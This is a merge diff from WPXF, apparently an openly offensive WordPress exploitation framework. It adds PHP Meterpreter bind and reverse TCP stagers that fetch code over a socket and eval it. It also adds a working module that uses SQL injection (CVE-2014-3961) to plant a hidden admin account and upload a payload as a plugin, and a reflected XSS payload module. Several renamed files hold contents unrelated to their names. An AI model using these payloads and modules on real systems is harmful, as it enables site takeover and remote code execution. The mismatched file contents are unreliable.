Merge branch 'development'

Author: rastating

.gitignore

@@ -91,7 +91,6 @@ sftp-config.json
 
 # Atom Plugins
 deployment-config.json
-Gemfile.lock
 
 # NPM
 node_modules/

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.4.3

.travis.yml

@@ -2,6 +2,7 @@ language: ruby
 rvm:
   - 2.3.5
   - 2.4.2
+  - 2.4.3
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
 script: bundle exec rspec

Gemfile

@@ -4,7 +4,7 @@ source 'https://rubygems.org'
 gem 'colorize', '>=0.8.1'
 gem 'mime-types', '>=3.1'
 gem 'nokogiri', '~>1.8.1'
-gem 'require_all', '~>1.4'
+gem 'require_all', '~>2.0'
 gem 'rubyzip', '~>1.2.1'
 gem 'slop', '~>4.6.0'
 gem 'typhoeus', '~>1.3.0'

Gemfile.lock

@@ -0,0 +1,48 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    colorize (0.8.1)
+    diff-lcs (1.3)
+    ethon (0.11.0)
+      ffi (>= 1.3.0)
+    ffi (1.9.18)
+    mime-types (3.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2016.0521)
+    mini_portile2 (2.3.0)
+    nokogiri (1.8.1)
+      mini_portile2 (~> 2.3.0)
+    require_all (2.0.0)
+    rspec (3.7.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+    rspec-core (3.7.0)
+      rspec-support (~> 3.7.0)
+    rspec-expectations (3.7.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.7.0)
+    rspec-mocks (3.7.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.7.0)
+    rspec-support (3.7.0)
+    rubyzip (1.2.1)
+    slop (4.6.0)
+    typhoeus (1.3.0)
+      ethon (>= 0.9.0)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  colorize (>= 0.8.1)
+  mime-types (>= 3.1)
+  nokogiri (~> 1.8.1)
+  require_all (~> 2.0)
+  rspec (~> 3.7)
+  rubyzip (~> 1.2.1)
+  slop (~> 4.6.0)
+  typhoeus (~> 1.3.0)
+
+BUNDLED WITH
+   1.16.1

VERSION

@@ -1 +1 @@
-1.8.1
+1.9

data/php/meterpreter_bind_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_bind_tcp_ipv6.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_reverse_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

lib/cli/context.rb

@@ -19,12 +19,7 @@ def load_module(path)
     end
 
     def reload
-      if @module_path =~ /^exploit\//i
-        load("#{@module_path.sub('exploit/', 'exploits/')}.rb")
-      else
-        load("#{@module_path}.rb")
-      end
-
+      load("#{@module_path}.rb")
       load_module(@module_path)
     end
 

lib/wpxf/utility/text.rb

@@ -40,11 +40,11 @@ def self.rand_alpha(length, casing = :mixed)
       # @return [Array] a range of alpha characters in the matching casing.
       def self.alpha_ranges(casing)
         if casing == :mixed
-          return [*'A'..'Z', *'a'..'z']
+          [*'A'..'Z', *'a'..'z']
         elsif casing == :upper
-          return [*'A'..'Z']
+          [*'A'..'Z']
         elsif casing == :lower
-          return [*'a'..'z']
+          [*'a'..'z']
         end
       end
 
@@ -66,7 +66,15 @@ def self.rand_email
       # Generate a random month name.
       # @return [String] the month name.
       def self.rand_month
-        %w(january february march april june july august september october november december).sample
+        %w[january february march april june july august september october november december].sample
+      end
+
+      # Convert each byte of a string to its hexadecimal value and
+      # concantenate them together, to provide a hexadecimal string.
+      # @param value [String] the string to hexify.
+      # @return [String] the hexadecimal string.
+      def self.hexify_string(value)
+        value.each_byte.map { |b| b.to_s(16) }.join
       end
     end
   end

modules/auxiliary/long_password_dos.rb renamed to modules/auxiliary/dos/long_password_dos.rb

@@ -1,5 +1,7 @@
 # frozen_string_literal: true
 
+require_rel './revslider_shell_upload'
+
 class Wpxf::Exploit::AriesRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
   def initialize
     super

modules/auxiliary/post_grid_file_deletion.rb renamed to modules/auxiliary/dos/post_grid_file_deletion.rb

@@ -1,6 +1,7 @@
 # frozen_string_literal: true
 
 require 'socket'
+require_rel './simplecart_shell_upload'
 
 class Wpxf::Exploit::CharityThemeShellUpload < Wpxf::Exploit::SimplecartShellUpload
   include Wpxf

modules/auxiliary/wp_v4.7.2_csrf_dos.rb renamed to modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb

@@ -1,5 +1,7 @@
 # frozen_string_literal: true
 
+require_rel './mobile_app_native_v3_shell_upload'
+
 class Wpxf::Exploit::MobileAppBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
   def initialize
     super

modules/auxiliary/ad_widget_php_file_download.rb renamed to modules/auxiliary/file_download/ad_widget_php_file_download.rb

@@ -0,0 +1,153 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Plugin
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Participants Database <= 1.5.4.8 Shell Upload',
+      desc: %(
+        In versions <= 1.5.4.8 of the Participants Database, anonymous users
+        are able to execute arbitrary SQL statements. This module utilises
+        this vulnerability to create a new admin user and upload a payload
+        masked as a plugin.
+      ),
+      author: [
+        'Yarubo Research Team', # Vulnerability discovery
+        'rastating'             # WPXF module
+      ],
+      references: [
+        ['CVE', '2014-3961'],
+        ['WPVDB', '7247'],
+        ['EDB', '33613']
+      ],
+      date: 'Aug 01 2014'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'sign_up_path',
+        desc: 'The relative path of the Participants Database sign up page',
+        required: true
+      ),
+      StringOption.new(
+        name: 'wp_prefix',
+        desc: 'The database table prefix. Default: wp_',
+        required: true,
+        default: 'wp_'
+      ),
+      IntegerOption.new(
+        name: 'user_id',
+        desc: 'The ID number to use for the new admin account',
+        required: true,
+        default: (60_000..90_000).to_a.sample
+      ),
+      StringOption.new(
+        name: 'username',
+        desc: 'The username to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_alpha(6)
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The password to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_alpha(6)
+      ),
+      StringOption.new(
+        name: 'email',
+        desc: 'The e-mail address to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_email
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('participants-database', '1.5.4.9')
+  end
+
+  def sign_up_url
+    normalize_uri(full_uri, datastore['sign_up_path'])
+  end
+
+  def user_id
+    normalized_option_value('user_id')
+  end
+
+  def hexified_username
+    "0x#{Utility::Text.hexify_string(datastore['username'])}"
+  end
+
+  def password_hash
+    Utility::Text.md5(datastore['password'])
+  end
+
+  def hexified_password_hash
+    "0x#{Utility::Text.hexify_string(password_hash)}"
+  end
+
+  def hexified_email
+    "0x#{Utility::Text.hexify_string(datastore['email'])}"
+  end
+
+  def table_name(name)
+    "#{datastore['wp_prefix']}#{name}"
+  end
+
+  def new_user_sql
+    [
+      "insert into #{table_name('users')}",
+      '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)',
+      'values',
+      "(#{user_id}, #{hexified_username}, #{hexified_password_hash}, #{hexified_username}, #{hexified_email}, 0, #{hexified_username});"
+    ].join(' ')
+  end
+
+  def user_meta_sql(key, value)
+    [
+      "insert into #{table_name('usermeta')}",
+      '(user_id, meta_key, meta_value) values',
+      "(#{user_id}, 0x#{Utility::Text.hexify_string(key)}, 0x#{Utility::Text.hexify_string(value)})"
+    ].join(' ')
+  end
+
+  def execute_sql_query(query)
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'output CSV')
+    builder.add_field('subsource', 'participants-database')
+    builder.add_field('CSV_type', 'participant list')
+    builder.add_field('query', query)
+
+    builder.create do |body|
+      execute_post_request(url: sign_up_url, body: body)
+    end
+  end
+
+  def update_user_meta(key, value)
+    execute_sql_query(user_meta_sql(key, value))
+  end
+
+  def execute_payload
+    emit_info 'Uploading the payload...'
+    cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
+    res = wordpress_upload_and_execute_payload_plugin(Utility::Text.rand_alpha(6), Utility::Text.rand_alpha(6), cookie)
+    res&.code != 404
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Creating a new user...'
+    execute_sql_query(new_user_sql)
+
+    emit_info 'Elevating user privileges...'
+    update_user_meta('wp_user_level', '10')
+    update_user_meta('wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')
+
+    execute_payload
+  end
+end

modules/auxiliary/all_in_one_migration_export.rb renamed to modules/auxiliary/file_download/all_in_one_migration_export.rb

@@ -1,5 +1,7 @@
 # frozen_string_literal: true
 
+require_rel './woocommerce_amazon_affiliates_v8_shell_upload'
+
 class Wpxf::Exploit::PremiumSeoPackShellUpload < Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload
   def initialize
     super

modules/auxiliary/antioch_arbitrary_file_download.rb renamed to modules/auxiliary/file_download/antioch_arbitrary_file_download.rb

@@ -1,5 +1,7 @@
 # frozen_string_literal: true
 
+require_rel './bws_panel_reflected_xss_shell_upload'
+
 class Wpxf::Exploit::AdsensePluginReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
   def initialize
     super

modules/auxiliary/candidate_application_form_arbitrary_file_download.rb renamed to modules/auxiliary/file_download/candidate_application_form_arbitrary_file_download.rb

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SplashingImagesReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Splashing Imagges 2.1 Reflected XSS',
+      author: [
+        'Nicolas Buzy-Debat',                     # Discovery
+        'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
+      ],
+      references: [
+        ['CVE', '2018-6194'],
+        ['WPVDB', '9016'],
+        ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/91']
+      ],
+      date: 'Jan 26 2018'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-splashing-images', '2.1.1')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'upload.php')
+  end
+
+  def url_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=wp-splashing&search=#{url_payload}"
+  end
+end